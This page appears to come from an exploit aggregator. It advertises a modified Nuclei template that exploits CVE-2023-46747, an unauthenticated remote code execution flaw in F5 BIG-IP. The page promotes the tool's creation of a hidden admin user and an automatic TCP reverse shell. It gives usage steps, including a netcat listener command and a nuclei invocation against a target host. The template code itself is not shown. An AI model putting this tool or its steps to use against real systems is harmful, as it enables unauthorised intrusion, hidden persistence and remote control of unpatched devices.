Share
## https://sploitus.com/exploit?id=A1E8B9E7-BE18-54B4-83A5-90CF232F48E7
# F5 BIG-IP CVE-2023-46747 - Unauthenticated RCE + Auto Reverse Shell  
**Modified & Improved Nuclei Template by Raguraman**

Critical unauthenticated remote code execution in F5 BIG-IP (CVSS 9.8)  
Original discovery: Praetorian + ProjectDiscovery  
Patch: https://my.f5.com/manage/s/article/K000137353 (Nov 2023)

### Features of this version
- Fully automated (no manual steps)
- Creates a hidden admin user
- Instantly drops TCP reverse shell (just change LHOST/LPORT)
- Clean output with credentials + token
- Works on all vulnerable versions (13.x โ†’ 17.x unpatched)

### Usage (Authorized testing only!)
```bash
# 1. Edit LHOST and LPORT in the YAML
# 2. Start listener
nc -lvnp 4444

# 3. Run with Nuclei
nuclei -t cve-2023-46747-revshell.yaml -u https://target.company.com